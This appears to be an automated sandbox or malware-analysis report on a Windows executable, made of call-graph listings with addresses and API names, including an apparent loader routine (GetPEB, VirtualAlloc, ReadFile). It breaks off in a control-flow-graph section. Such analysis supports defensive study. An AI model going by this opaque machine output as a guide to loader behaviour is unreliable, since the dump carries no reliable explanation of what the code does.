94784->94785 94785->94783 94787 373e71 _fseek 94786->94787 94788 373e94 94787->94788 94789 373e7f 94787->94789 94791 374e1c __lock_file 48 API calls 94788->94791 94800 377c0e 47 API calls __getptd_noexit 94789->94800 94793 373e9a 94791->94793 94792 373e84 94801 376e10 8 API calls _fseek 94792->94801 94802 373b0c 55 API calls 5 library calls 94793->94802 94796 373ea5 94803 373ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94796->94803 94798 373eb7 94799 373e8f _fseek 94798->94799 94799->94630 94800->94792 94801->94799 94802->94796 94803->94798 94809 39c581 __tzset_nolock _wcscmp 94804->94809 94805 3544ed 64 API calls 94805->94809 94806 39c417 94806->94546 94806->94573 94807 39bf5a GetSystemTimeAsFileTime 94807->94809 94808 354517 83 API calls 94808->94809 94809->94805 94809->94806 94809->94807 94809->94808 94811 39b97e 94810->94811 94812 39b970 94810->94812 94814 39b9c3 94811->94814 94815 373499 117 API calls 94811->94815 94825 39b987 94811->94825 94813 373499 117 API calls 94812->94813 94813->94811 94841 39bbe8 64 API calls 3 library calls 94814->94841 94817 39b9a8 94815->94817 94817->94814 94819 39b9b1 94817->94819 94818 39ba07 94820 39ba0b 94818->94820 94821 39ba2c 94818->94821 94819->94825 94852 3735e4 94819->94852 94824 39ba18 94820->94824 94827 3735e4 __fcloseall 83 API calls 94820->94827 94842 39b7e5 47 API calls __crtGetStringTypeA_stat 94821->94842 94824->94825 94829 3735e4 __fcloseall 83 API calls 94824->94829 94825->94575 94826 39ba34 94828 39ba5a 94826->94828 94830 39ba3a 94826->94830 94827->94824 94843 39ba8a 90 API calls 94828->94843 94829->94825 94832 3735e4 __fcloseall 83 API calls 94830->94832 94833 39ba47 94830->94833 94832->94833 94833->94825 94836 3735e4 __fcloseall 83 API calls 94833->94836 94834 39ba61 94844 39bb64 94834->94844 94836->94825 94838 39ba75 94838->94825 94840 3735e4 __fcloseall 83 API calls 94838->94840 94839 3735e4 __fcloseall 83 API calls 94839->94838 94840->94825 94841->94818 94842->94826 94843->94834 94845 39bb77 94844->94845 94846 39bb71 94844->94846 94848 371c9d _free 47 API calls 94845->94848 94849 39bb88 94845->94849 94847 371c9d _free 47 API calls 94846->94847 94847->94845 94848->94849 94850 371c9d _free 47 API calls 94849->94850 94851 39ba68 94849->94851 94850->94851 94851->94838 94851->94839 94853 3735f0 _fseek 94852->94853 94854 373604 94853->94854 94855 37361c 94853->94855 94881 377c0e 47 API calls __getptd_noexit 94854->94881 94857 374e1c __lock_file 48 API calls 94855->94857 94861 373614 _fseek 94855->94861 94859 37362e 94857->94859 94858 373609 94882 376e10 8 API calls _fseek 94858->94882 94865 373578 94859->94865 94861->94825 94866 373587 94865->94866 94868 37359b 94865->94868 94924 377c0e 47 API calls __getptd_noexit 94866->94924 94869 373597 94868->94869 94884 372c84 94868->94884 94883 373653 LeaveCriticalSection LeaveCriticalSection _fseek 94869->94883 94870 37358c 94925 376e10 8 API calls _fseek 94870->94925 94877 3735b5 94901 37e9d2 94877->94901 94879 3735bb 94879->94869 94880 371c9d _free 47 API calls 94879->94880 94880->94869 94881->94858 94882->94861 94883->94861 94885 372c97 94884->94885 94886 372cbb 94884->94886 94885->94886 94887 372933 __flush 47 API calls 94885->94887 94890 37eb36 94886->94890 94888 372cb4 94887->94888 94926 37af61 94888->94926 94891 3735af 94890->94891 94892 37eb43 94890->94892 94894 372933 94891->94894 94892->94891 94893 371c9d _free 47 API calls 94892->94893 94893->94891 94895 372952 94894->94895 94896 37293d 94894->94896 94895->94877 94951 377c0e 47 API calls __getptd_noexit 94896->94951 94898 372942 94952 376e10 8 API calls _fseek 94898->94952 94900 37294d 94900->94877 94902 37e9de _fseek 94901->94902 94903 37e9e6 94902->94903 94904 37e9fe 94902->94904 94977 377bda 47 API calls __getptd_noexit 94903->94977 94905 37ea7b 94904->94905 94910 37ea28 94904->94910 94981 377bda 47 API calls __getptd_noexit 94905->94981 94908 37e9eb 94978 377c0e 47 API calls __getptd_noexit 94908->94978 94909 37ea80 94982 377c0e 47 API calls __getptd_noexit 94909->94982 94953 37a8ed 94910->94953 94912 37e9f3 _fseek 94912->94879 94915 37ea88 94983 376e10 8 API calls _fseek 94915->94983 94916 37ea2e 94918 37ea41 94916->94918 94919 37ea4c 94916->94919 94962 37ea9c 94918->94962 94979 377c0e 47 API calls __getptd_noexit 94919->94979 94922 37ea47 94980 37ea73 LeaveCriticalSection __unlock_fhandle 94922->94980 94924->94870 94925->94869 94927 37af6d _fseek 94926->94927 94928 37af75 94927->94928 94929 37af8d 94927->94929 94930 377bda __dosmaperr 47 API calls 94928->94930 94931 37b022 94929->94931 94935 37afbf 94929->94935 94932 37af7a 94930->94932 94933 377bda __dosmaperr 47 API calls 94931->94933 94934 377c0e _fseek 47 API calls 94932->94934 94936 37b027 94933->94936 94948 37af82 _fseek 94934->94948 94937 37a8ed ___lock_fhandle 49 API calls 94935->94937 94938 377c0e _fseek 47 API calls 94936->94938 94939 37afc5 94937->94939 94940 37b02f 94938->94940 94941 37afeb 94939->94941 94942 37afd8 94939->94942 94943 376e10 _fseek 8 API calls 94940->94943 94945 377c0e _fseek 47 API calls 94941->94945 94944 37b043 __chsize_nolock 75 API calls 94942->94944 94943->94948 94947 37afe4 94944->94947 94946 37aff0 94945->94946 94949 377bda __dosmaperr 47 API calls 94946->94949 94950 37b01a __flush LeaveCriticalSection 94947->94950 94948->94886 94949->94947 94950->94948 94951->94898 94952->94900 94954 37a8f9 _fseek 94953->94954 94955 37a946 EnterCriticalSection 94954->94955 94956 377cf4 __lock 47 API calls 94954->94956 94957 37a96c _fseek 94955->94957 94958 37a91d 94956->94958 94957->94916 94959 37a93a 94958->94959 94960 37a928 InitializeCriticalSectionAndSpinCount 94958->94960 94961 37a970 ___lock_fhandle LeaveCriticalSection 94959->94961 94960->94959 94961->94955 94963 37aba4 __lseek_nolock 47 API calls 94962->94963 94966 37eaaa 94963->94966 94964 37eb00 94965 37ab1e __free_osfhnd 48 API calls 94964->94965 94969 37eb08 94965->94969 94966->94964 94967 37aba4 __lseek_nolock 47 API calls 94966->94967 94976 37eade 94966->94976 94970 37ead5 94967->94970 94968 37aba4 __lseek_nolock 47 API calls 94971 37eaea CloseHandle 94968->94971 94972 37eb2a 94969->94972 94975 377bed __dosmaperr 47 API calls 94969->94975 94973 37aba4 __lseek_nolock 47 API calls 94970->94973 94971->94964 94974 37eaf6 GetLastError 94971->94974 94972->94922 94973->94976 94974->94964 94975->94972 94976->94964 94976->94968 94977->94908 94978->94912 94979->94922 94980->94912 94981->94909 94982->94915 94983->94912 94984->94486 94985->94496 94986->94496 94987->94490 94988->94509 94989->94511 94990->94508 94992 37f8a0 __ftell_nolock 94991->94992 94993 3540b4 GetLongPathNameW 94992->94993 94994 356a63 48 API calls 94993->94994 94995 3540dc 94994->94995 94996 3549a0 94995->94996 94997 35d7f7 48 API calls 94996->94997 94998 3549b2 94997->94998 94999 35660f 49 API calls 94998->94999 95000 3549bd 94999->95000 95001 3c2e35 95000->95001 95002 3549c8 95000->95002 95007 3c2e4f 95001->95007 95049 36d35e 60 API calls 95001->95049 95003 3564cf 48 API calls 95002->95003 95005 3549d4 95003->95005 95043 3528a6 95005->95043 95008 3549e7 Mailbox 95008->94360 95010 3541a9 136 API calls 95009->95010 95011 35415e 95010->95011 95012 3c3489 95011->95012 95014 3541a9 136 API calls 95011->95014 95013 39c396 122 API calls 95012->95013 95015 3c349e 95013->95015 95016 354172 95014->95016 95017 3c34bf 95015->95017 95018 3c34a2 95015->95018 95016->95012 95019 35417a 95016->95019 95021 36f4ea 48 API calls 95017->95021 95020 354252 84 API calls 95018->95020 95022 354186 95019->95022 95023 3c34aa 95019->95023 95020->95023 95042 3c3504 Mailbox 95021->95042 95050 35c833 95022->95050 95161 396b49 87 API calls _wprintf 95023->95161 95026 3c34b8 95026->95017 95028 3c36b4 95029 371c9d _free 47 API calls 95028->95029 95030 3c36bc 95029->95030 95031 354252 84 API calls 95030->95031 95036 3c36c5 95031->95036 95035 371c9d _free 47 API calls 95035->95036 95036->95035 95038 354252 84 API calls 95036->95038 95163 3925b5 86 API calls 4 library calls 95036->95163 95038->95036 95039 35ce19 48 API calls 95039->95042 95042->95028 95042->95036 95042->95039 95138 392551 95042->95138 95141 399c12 95042->95141 95147 35ba85 95042->95147 95155 354dd9 95042->95155 95162 392472 60 API calls 2 library calls 95042->95162 95044 3528b8 95043->95044 95048 3528d7 ___crtGetEnvironmentStringsW 95043->95048 95046 36f4ea 48 API calls 95044->95046 95045 36f4ea 48 API calls 95047 3528ee 95045->95047 95046->95048 95047->95008 95048->95045 95049->95001 95051 35c843 __ftell_nolock 95050->95051 95052 35c860 95051->95052 95053 3c3095 95051->95053 95169 3548ba 49 API calls 95052->95169 95188 3925b5 86 API calls 4 library calls 95053->95188 95056 35c882 95170 354550 56 API calls 95056->95170 95057 3c30a8 95189 3925b5 86 API calls 4 library calls 95057->95189 95059 35c897 95059->95057 95061 35c89f 95059->95061 95063 35d7f7 48 API calls 95061->95063 95062 3c30c4 95065 35c90c 95062->95065 95064 35c8ab 95063->95064 95171 36e968 49 API calls __ftell_nolock 95064->95171 95067 3c30d7 95065->95067 95068 35c91a 95065->95068 95071 354907 CloseHandle 95067->95071 95174 371dfc 95068->95174 95069 35c8b7 95072 35d7f7 48 API calls 95069->95072 95073 3c30e3 95071->95073 95074 35c8c3 95072->95074 95075 3541a9 136 API calls 95073->95075 95076 35660f 49 API calls 95074->95076 95077 3c310d 95075->95077 95078 35c8d1 95076->95078 95080 3c3136 95077->95080 95084 39c396 122 API calls 95077->95084 95172 36eb66 SetFilePointerEx ReadFile 95078->95172 95079 35c943 _wcscat _wcscpy 95083 35c96d SetCurrentDirectoryW 95079->95083 95190 3925b5 86 API calls 4 library calls 95080->95190 95088 36f4ea 48 API calls 95083->95088 95089 3c3129 95084->95089 95085 35c8fd 95173 3546ce SetFilePointerEx SetFilePointerEx 95085->95173 95087 3c314d 95122 35cad1 Mailbox 95087->95122 95090 35c988 95088->95090 95091 3c3131 95089->95091 95092 3c3152 95089->95092 95094 3547b7 48 API calls 95090->95094 95095 354252 84 API calls 95091->95095 95093 354252 84 API calls 95092->95093 95096 3c3157 95093->95096 95125 35c993 Mailbox __wsetenvp 95094->95125 95095->95080 95097 36f4ea 48 API calls 95096->95097 95104 3c3194 95097->95104 95098 35ca9d 95184 354907 95098->95184 95102 353d98 95102->94234 95102->94256 95103 35caa9 SetCurrentDirectoryW 95103->95122 95106 35ba85 48 API calls 95104->95106 95135 3c31dd Mailbox 95106->95135 95108 3c33ce 95193 399b72 48 API calls 95108->95193 95109 3c3467 95197 3925b5 86 API calls 4 library calls 95109->95197 95113 3c3480 95113->95098 95114 3c33f0 95194 3b29e8 48 API calls ___crtGetEnvironmentStringsW 95114->95194 95116 3c33fd 95117 371c9d _free 47 API calls 95116->95117 95117->95122 95119 3c345f 95196 39240b 48 API calls 3 library calls 95119->95196 95120 35ce19 48 API calls 95120->95125 95164 3548dd 95122->95164 95123 35ba85 48 API calls 95123->95135 95125->95098 95125->95109 95125->95119 95125->95120 95177 35b337 56 API calls _wcscpy 95125->95177 95178 36c258 GetStringTypeW 95125->95178 95179 35cb93 59 API calls __wcsnicmp 95125->95179 95180 35cb5a GetStringTypeW __wsetenvp 95125->95180 95181 3716d0 GetStringTypeW __wtof_l 95125->95181 95182 35cc24 162 API calls 3 library calls 95125->95182 95183 36c682 48 API calls 95125->95183 95127 392551 48 API calls 95127->95135 95129 35ce19 48 API calls 95129->95135 95131 399c12 48 API calls 95131->95135 95132 3c3420 95195 3925b5 86 API calls 4 library calls 95132->95195 95134 3c3439 95136 371c9d _free 47 API calls 95134->95136 95135->95108 95135->95123 95135->95127 95135->95129 95135->95131 95135->95132 95191 392472 60 API calls 2 library calls 95135->95191 95192 36c682 48 API calls 95135->95192 95137 3c344c 95136->95137 95137->95122 95139 36f4ea 48 API calls 95138->95139 95140 392581 ___crtGetEnvironmentStringsW 95139->95140 95140->95042 95142 399c1d 95141->95142 95143 36f4ea 48 API calls 95142->95143 95144 399c34 95143->95144 95145 399c43 95144->95145 95146 35ce19 48 API calls 95144->95146 95145->95042 95146->95145 95148 35bb25 95147->95148 95152 35ba98 ___crtGetEnvironmentStringsW 95147->95152 95150 36f4ea 48 API calls 95148->95150 95149 36f4ea 48 API calls 95151 35ba9f 95149->95151 95150->95152 95153 35bac8 95151->95153 95154 36f4ea 48 API calls 95151->95154 95152->95149 95153->95042 95154->95153 95156 354dec 95155->95156 95158 354e9a 95155->95158 95157 36f4ea 48 API calls 95156->95157 95160 354e1e 95156->95160 95157->95160 95158->95042 95159 36f4ea 48 API calls 95159->95160 95160->95158 95160->95159 95161->95026 95162->95042 95163->95036 95165 354907 CloseHandle 95164->95165 95166 3548e5 Mailbox 95165->95166 95167 354907 CloseHandle 95166->95167 95168 3548fc 95167->95168 95168->95102 95169->95056 95170->95059 95171->95069 95172->95085 95173->95065 95198 371e46 95174->95198 95177->95125 95178->95125 95179->95125 95180->95125 95181->95125 95182->95125 95183->95125 95185 354911 95184->95185 95186 354920 95184->95186 95185->95103 95186->95185 95187 354925 CloseHandle 95186->95187 95187->95185 95188->95057 95189->95062 95190->95087 95191->95135 95192->95135 95193->95114 95194->95116 95195->95134 95196->95109 95197->95113 95200 371e61 95198->95200 95202 371e55 95198->95202 95222 377c0e 47 API calls __getptd_noexit 95200->95222 95201 372019 95204 371e41 95201->95204 95223 376e10 8 API calls _fseek 95201->95223 95202->95200 95210 371ed4 95202->95210 95217 379d6b 47 API calls _fseek 95202->95217 95204->95079 95206 371fa0 95206->95200 95206->95204 95209 371fb0 95206->95209 95207 371f5f 95207->95200 95208 371f7b 95207->95208 95219 379d6b 47 API calls _fseek 95207->95219 95208->95200 95208->95204 95213 371f91 95208->95213 95221 379d6b 47 API calls _fseek 95209->95221 95210->95200 95216 371f41 95210->95216 95218 379d6b 47 API calls _fseek 95210->95218 95220 379d6b 47 API calls _fseek 95213->95220 95216->95206 95216->95207 95217->95210 95218->95216 95219->95208 95220->95204 95221->95204 95222->95201 95223->95204 95225 354d94 95224->95225 95226 354c8b 95224->95226 95225->94366 95226->95225 95227 36f4ea 48 API calls 95226->95227 95228 354cb2 95227->95228 95229 36f4ea 48 API calls 95228->95229 95234 354d22 95229->95234 95232 354dd9 48 API calls 95232->95234 95233 35ba85 48 API calls 95233->95234 95234->95225 95234->95232 95234->95233 95237 35b470 95234->95237 95265 399af1 48 API calls 95234->95265 95235->94368 95236->94370 95238 356b0f 48 API calls 95237->95238 95256 35b495 95238->95256 95239 35b69b 95240 35ba85 48 API calls 95239->95240 95241 35b6b5 Mailbox 95240->95241 95241->95234 95244 3c397b 95271 3926bc 88 API calls 4 library calls 95244->95271 95245 35b9e4 95272 3926bc 88 API calls 4 library calls 95245->95272 95246 35ba85 48 API calls 95246->95256 95249 3c3973 95249->95241 95252 3c3989 95254 35ba85 48 API calls 95252->95254 95253 35bcce 48 API calls 95253->95256 95254->95249 95255 3c3909 95257 356b4a 48 API calls 95255->95257 95256->95239 95256->95244 95256->95245 95256->95246 95256->95253 95256->95255 95258 35bb85 48 API calls 95256->95258 95261 35bdfa 48 API calls 95256->95261 95264 3c3939 ___crtGetEnvironmentStringsW 95256->95264 95266 35c413 59 API calls 95256->95266 95267 35bc74 48 API calls 95256->95267 95268 35c6a5 49 API calls 95256->95268 95269 35c799 48 API calls ___crtGetEnvironmentStringsW 95256->95269 95259 3c3914 95257->95259 95258->95256 95263 36f4ea 48 API calls 95259->95263 95262 35b66c CharUpperBuffW 95261->95262 95262->95256 95263->95264 95270 3926bc 88 API calls 4 library calls 95264->95270 95265->95234 95266->95256 95267->95256 95268->95256 95269->95256 95270->95249 95271->95252 95272->95249 95274 3c418d EnumResourceNamesW 95273->95274 95275 35403c LoadImageW 95273->95275 95276 353ee1 RegisterClassExW 95274->95276 95275->95276 95277 353f53 7 API calls 95276->95277 95277->94385 95279 35f130 95278->95279 95281 35fe30 335 API calls 95279->95281 95284 35f199 95279->95284 95280 35f595 95289 35d7f7 48 API calls 95280->95289 95310 35f431 Mailbox 95280->95310 95282 3c8728 95281->95282 95282->95284 95377 39cc5c 86 API calls 4 library calls 95282->95377 95283 3c87c8 95380 39cc5c 86 API calls 4 library calls 95283->95380 95284->95280 95291 35d7f7 48 API calls 95284->95291 95308 35f229 95284->95308 95332 35f3dd 95284->95332 95285 35fe30 335 API calls 95285->95310 95286 35f418 95292 3c8b1b 95286->95292 95286->95310 95313 35f6aa 95286->95313 95290 3c87a3 95289->95290 95379 370f0a 52 API calls __cinit 95290->95379 95293 3c8772 95291->95293 95314 3c8b2c 95292->95314 95315 3c8bcf 95292->95315 95378 370f0a 52 API calls __cinit 95293->95378 95294 39cc5c 86 API calls 95294->95310 95296 35f3f2 95296->95286 95381 399af1 48 API calls 95296->95381 95297 35f770 95303 3c8a45 95297->95303 95304 35f77a 95297->95304 95299 35d6e9 55 API calls 95299->95310 95301 3c8c53 95395 39cc5c 86 API calls 4 library calls 95301->95395 95302 3c8810 95382 3aeef8 335 API calls 95302->95382 95387 36c1af 48 API calls 95303->95387 95320 361b90 48 API calls 95304->95320 95305 35fe30 335 API calls 95305->95313 95306 3c8b7e 95390 3ae40a 335 API calls Mailbox 95306->95390 95308->95280 95308->95286 95308->95310 95308->95332 95310->95285 95310->95294 95310->95299 95310->95301 95310->95306 95316 3c8beb 95310->95316 95321 35f537 Mailbox 95310->95321 95322 361b90 48 API calls 95310->95322 95324 35fce0 95310->95324 95376 35dd47 48 API calls ___crtGetEnvironmentStringsW 95310->95376 95388 3897ed InterlockedDecrement 95310->95388 95396 36c1af 48 API calls 95310->95396 95313->95297 95313->95305 95313->95310 95313->95321 95313->95324 95389 3af5ee 335 API calls 95314->95389 95392 39cc5c 86 API calls 4 library calls 95315->95392 95393 3abdbd 335 API calls Mailbox 95316->95393 95320->95310 95321->94411 95322->95310 95324->95321 95391 39cc5c 86 API calls 4 library calls 95324->95391 95325 3c8c00 95325->95321 95394 39cc5c 86 API calls 4 library calls 95325->95394 95329 3c884b 95383 3accdc 48 API calls 95329->95383 95330 3c8823 95330->95286 95330->95329 95332->95283 95332->95296 95332->95310 95333 3c8857 95335 3c8865 95333->95335 95336 3c88aa 95333->95336 95384 399b72 48 API calls 95335->95384 95339 3c88a0 Mailbox 95336->95339 95385 39a69d 48 API calls 95336->95385 95337 35fe30 335 API calls 95337->95321 95339->95337 95341 3c88e7 95386 35bc74 48 API calls 95341->95386 95344 364637 95343->95344 95345 36479f 95343->95345 95346 364643 95344->95346 95347 3c6e05 95344->95347 95348 35ce19 48 API calls 95345->95348 95450 364300 335 API calls ___crtGetEnvironmentStringsW 95346->95450 95451 3ae822 335 API calls Mailbox 95347->95451 95355 3646e4 Mailbox 95348->95355 95351 3c6e11 95352 364739 Mailbox 95351->95352 95452 39cc5c 86 API calls 4 library calls 95351->95452 95352->94411 95354 364659 95354->95351 95354->95352 95354->95355 95357 354252 84 API calls 95355->95357 95397 3a6ff0 95355->95397 95406 396524 95355->95406 95409 39fa0c 95355->95409 95357->95352 95360->94411 95361->94411 95362->94411 95363->94411 95364->94411 95365->94391 95366->94395 95367->94400 95368->94411 95369->94411 95370->94418 95371->94418 95372->94418 95373->94418 95374->94418 95375->94418 95376->95310 95377->95284 95378->95308 95379->95310 95380->95321 95381->95302 95382->95330 95383->95333 95384->95339 95385->95341 95386->95339 95387->95310 95388->95310 95389->95310 95390->95324 95391->95321 95392->95321 95393->95325 95394->95321 95395->95321 95396->95310 95398 35936c 81 API calls 95397->95398 95399 3a702a 95398->95399 95400 35b470 91 API calls 95399->95400 95401 3a703a 95400->95401 95402 3a705f 95401->95402 95403 35fe30 335 API calls 95401->95403 95405 3a7063 95402->95405 95453 35cdb9 48 API calls 95402->95453 95403->95402 95405->95352 95454 396ca9 GetFileAttributesW 95406->95454 95410 39fa1c __ftell_nolock 95409->95410 95411 39fa44 95410->95411 95519 35d286 48 API calls 95410->95519 95413 35936c 81 API calls 95411->95413 95414 39fa5e 95413->95414 95415 39fb68 95414->95415 95416 39fa80 95414->95416 95425 39fb92 95414->95425 95417 3541a9 136 API calls 95415->95417 95418 35936c 81 API calls 95416->95418 95419 39fb79 95417->95419 95424 39fa8c _wcscpy _wcschr 95418->95424 95420 39fb8e 95419->95420 95422 3541a9 136 API calls 95419->95422 95421 35936c 81 API calls 95420->95421 95420->95425 95423 39fbc7 95421->95423 95422->95420 95426 371dfc __wsplitpath 47 API calls 95423->95426 95429 39fab0 _wcscat _wcscpy 95424->95429 95432 39fade _wcscat 95424->95432 95425->95352 95436 39fbeb _wcscat _wcscpy 95426->95436 95427 35936c 81 API calls 95428 39fafc _wcscpy 95427->95428 95520 3972cb GetFileAttributesW 95428->95520 95430 35936c 81 API calls 95429->95430 95430->95432 95432->95427 95433 35936c 81 API calls 95435 39fb48 95433->95435 95434 39fb1c __wsetenvp 95434->95425 95434->95433 95521 3960dd 77 API calls 4 library calls 95435->95521 95438 35936c 81 API calls 95436->95438 95440 39fc82 95438->95440 95439 39fb5c 95439->95425 95458 39690b 95440->95458 95442 39fca2 95443 396524 3 API calls 95442->95443 95444 39fcb1 95443->95444 95445 35936c 81 API calls 95444->95445 95448 39fce2 95444->95448 95446 39fccb 95445->95446 95464 39bfa4 95446->95464 95449 354252 84 API calls 95448->95449 95449->95425 95450->95354 95451->95351 95452->95352 95453->95405 95455 396529 95454->95455 95456 396cc4 FindFirstFileW 95454->95456 95455->95352 95456->95455 95457 396cd9 FindClose 95456->95457 95457->95455 95459 396918 _wcschr __ftell_nolock 95458->95459 95460 371dfc __wsplitpath 47 API calls 95459->95460 95463 39692e _wcscat _wcscpy 95459->95463 95461 39695d 95460->95461 95462 371dfc __wsplitpath 47 API calls 95461->95462 95462->95463 95463->95442 95465 39bfb1 __ftell_nolock 95464->95465 95466 36f4ea 48 API calls 95465->95466 95467 39c00e 95466->95467 95468 3547b7 48 API calls 95467->95468 95469 39c018 95468->95469 95470 39bdb4 GetSystemTimeAsFileTime 95469->95470 95471 39c023 95470->95471 95472 354517 83 API calls 95471->95472 95473 39c036 _wcscmp 95472->95473 95474 39c05a 95473->95474 95475 39c107 95473->95475 95476 39c56d 94 API calls 95474->95476 95477 39c56d 94 API calls 95475->95477 95478 39c05f 95476->95478 95479 39c0d3 _wcscat 95477->95479 95480 371dfc __wsplitpath 47 API calls 95478->95480 95482 39c110 95478->95482 95481 3544ed 64 API calls 95479->95481 95479->95482 95485 39c088 _wcscat _wcscpy 95480->95485 95483 39c12c 95481->95483 95482->95448 95484 3544ed 64 API calls 95483->95484 95486 39c13c 95484->95486 95488 371dfc __wsplitpath 47 API calls 95485->95488 95487 3544ed 64 API calls 95486->95487 95489 39c157 95487->95489 95488->95479 95490 3544ed 64 API calls 95489->95490 95491 39c167 95490->95491 95492 3544ed 64 API calls 95491->95492 95493 39c182 95492->95493 95494 3544ed 64 API calls 95493->95494 95495 39c192 95494->95495 95496 3544ed 64 API calls 95495->95496 95497 39c1a2 95496->95497 95498 3544ed 64 API calls 95497->95498 95499 39c1b2 95498->95499 95522 39c71a GetTempPathW GetTempFileNameW 95499->95522 95501 39c1be 95502 373499 117 API calls 95501->95502 95513 39c1cf 95502->95513 95503 39c289 95504 3735e4 __fcloseall 83 API calls 95503->95504 95505 39c294 95504->95505 95507 39c29a DeleteFileW 95505->95507 95508 39c2ae 95505->95508 95506 3544ed 64 API calls 95506->95513 95507->95482 95509 39c342 CopyFileW 95508->95509 95514 39c2b8 95508->95514 95510 39c358 DeleteFileW 95509->95510 95511 39c36a DeleteFileW 95509->95511 95510->95482 95536 39c6d9 CreateFileW 95511->95536 95513->95482 95513->95503 95513->95506 95523 372aae 95513->95523 95516 39b965 118 API calls 95514->95516 95517 39c32d 95516->95517 95517->95511 95518 39c331 DeleteFileW 95517->95518 95518->95482 95519->95411 95520->95434 95521->95439 95522->95501 95524 372aba _fseek 95523->95524 95525 372ad4 95524->95525 95526 372aec 95524->95526 95527 372ae4 _fseek 95524->95527 95551 377c0e 47 API calls __getptd_noexit 95525->95551 95528 374e1c __lock_file 48 API calls 95526->95528 95527->95513 95531 372af2 95528->95531 95530 372ad9 95552 376e10 8 API calls _fseek 95530->95552 95539 372957 95531->95539 95537 39c6ff SetFileTime CloseHandle 95536->95537 95538 39c715 95536->95538 95537->95538 95538->95482 95540 372966 95539->95540 95545 372984 95539->95545 95541 372974 95540->95541 95540->95545 95549 37299c ___crtGetEnvironmentStringsW 95540->95549 95554 377c0e 47 API calls __getptd_noexit 95541->95554 95543 372979 95555 376e10 8 API calls _fseek 95543->95555 95553 372b24 LeaveCriticalSection LeaveCriticalSection _fseek 95545->95553 95547 372c84 __flush 78 API calls 95547->95549 95548 372933 __flush 47 API calls 95548->95549 95549->95545 95549->95547 95549->95548 95550 37af61 __flush 78 API calls 95549->95550 95556 378e63 78 API calls 6 library calls 95549->95556 95550->95549 95551->95530 95552->95527 95553->95527 95554->95543 95555->95545 95556->95549 95557 fd9493 95560 fd9108 95557->95560 95559 fd94df 95561 fd6b38 GetPEB 95560->95561 95564 fd91a7 95561->95564 95563 fd91d8 CreateFileW 95563->95564 95567 fd91e5 95563->95567 95565 fd9201 VirtualAlloc 95564->95565 95564->95567 95571 fd9308 CloseHandle 95564->95571 95572 fd9318 VirtualFree 95564->95572 95573 fda018 GetPEB 95564->95573 95566 fd9222 ReadFile 95565->95566 95565->95567 95566->95567 95570 fd9240 VirtualAlloc 95566->95570 95568 fd93f4 VirtualFree 95567->95568 95569 fd9402 95567->95569 95568->95569 95569->95559 95570->95564 95570->95567 95571->95564 95572->95564 95574 fda042 95573->95574 95574->95563

                                                                  Executed Functions

                                                                  Function 0037B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 644 37b043-37b080 call 37f8a0 647 37b082-37b084 644->647 648 37b089-37b08b 644->648 649 37b860-37b86c call 37a70c 647->649 650 37b08d-37b0a7 call 377bda call 377c0e call 376e10 648->650 651 37b0ac-37b0d9 648->651 650->649 652 37b0e0-37b0e7 651->652 653 37b0db-37b0de 651->653 657 37b105 652->657 658 37b0e9-37b100 call 377bda call 377c0e call 376e10 652->658 653->652 656 37b10b-37b110 653->656 662 37b112-37b11c call 37f82f 656->662 663 37b11f-37b12d call 383bf2 656->663 657->656 693 37b851-37b854 658->693 662->663 674 37b133-37b145 663->674 675 37b44b-37b45d 663->675 674->675 677 37b14b-37b183 call 377a0d GetConsoleMode 674->677 678 37b463-37b473 675->678 679 37b7b8-37b7d5 WriteFile 675->679 677->675 698 37b189-37b18f 677->698 684 37b55a-37b55f 678->684 685 37b479-37b484 678->685 681 37b7d7-37b7df 679->681 682 37b7e1-37b7e7 GetLastError 679->682 687 37b7e9 681->687 682->687 688 37b565-37b56e 684->688 689 37b663-37b66e 684->689 691 37b81b-37b833 685->691 692 37b48a-37b49a 685->692 695 37b7ef-37b7f1 687->695 688->691 696 37b574 688->696 689->691 694 37b674 689->694 700 37b835-37b838 691->700 701 37b83e-37b84e call 377c0e call 377bda 691->701 699 37b4a0-37b4a3 692->699 697 37b85e-37b85f 693->697 703 37b67e-37b693 694->703 705 37b856-37b85c 695->705 706 37b7f3-37b7f5 695->706 707 37b57e-37b595 696->707 697->649 708 37b191-37b193 698->708 709 37b199-37b1bc GetConsoleCP 698->709 710 37b4a5-37b4be 699->710 711 37b4e9-37b520 WriteFile 699->711 700->701 702 37b83a-37b83c 700->702 701->693 702->697 713 37b699-37b69b 703->713 705->697 706->691 715 37b7f7-37b7fc 706->715 716 37b59b-37b59e 707->716 708->675 708->709 717 37b1c2-37b1ca 709->717 718 37b440-37b446 709->718 719 37b4c0-37b4ca 710->719 720 37b4cb-37b4e7 710->720 711->682 712 37b526-37b538 711->712 712->695 721 37b53e-37b54f 712->721 722 37b69d-37b6b3 713->722 723 37b6d8-37b719 WideCharToMultiByte 713->723 725 37b812-37b819 call 377bed 715->725 726 37b7fe-37b810 call 377c0e call 377bda 715->726 727 37b5a0-37b5b6 716->727 728 37b5de-37b627 WriteFile 716->728 729 37b1d4-37b1d6 717->729 718->706 719->720 720->699 720->711 721->692 730 37b555 721->730 731 37b6c7-37b6d6 722->731 732 37b6b5-37b6c4 722->732 723->682 734 37b71f-37b721 723->734 725->693 726->693 736 37b5cd-37b5dc 727->736 737 37b5b8-37b5ca 727->737 728->682 739 37b62d-37b645 728->739 740 37b1dc-37b1fe 729->740 741 37b36b-37b36e 729->741 730->695 731->713 731->723 732->731 744 37b727-37b75a WriteFile 734->744 736->716 736->728 737->736 739->695 747 37b64b-37b658 739->747 748 37b217-37b223 call 371688 740->748 749 37b200-37b215 740->749 742 37b375-37b3a2 741->742 743 37b370-37b373 741->743 752 37b3a8-37b3ab 742->752 743->742 743->752 753 37b75c-37b776 744->753 754 37b77a-37b78e GetLastError 744->754 747->707 756 37b65e 747->756 764 37b225-37b239 748->764 765 37b269-37b26b 748->765 750 37b271-37b283 call 3840f7 749->750 774 37b435-37b43b 750->774 775 37b289 750->775 758 37b3b2-37b3c5 call 385884 752->758 759 37b3ad-37b3b0 752->759 753->744 761 37b778 753->761 763 37b794-37b796 754->763 756->695 758->682 778 37b3cb-37b3d5 758->778 759->758 766 37b407-37b40a 759->766 761->763 763->687 769 37b798-37b7b0 763->769 771 37b412-37b42d 764->771 772 37b23f-37b254 call 3840f7 764->772 765->750 766->729 770 37b410 766->770 769->703 776 37b7b6 769->776 770->774 771->774 772->774 784 37b25a-37b267 772->784 774->687 779 37b28f-37b2c4 WideCharToMultiByte 775->779 776->695 781 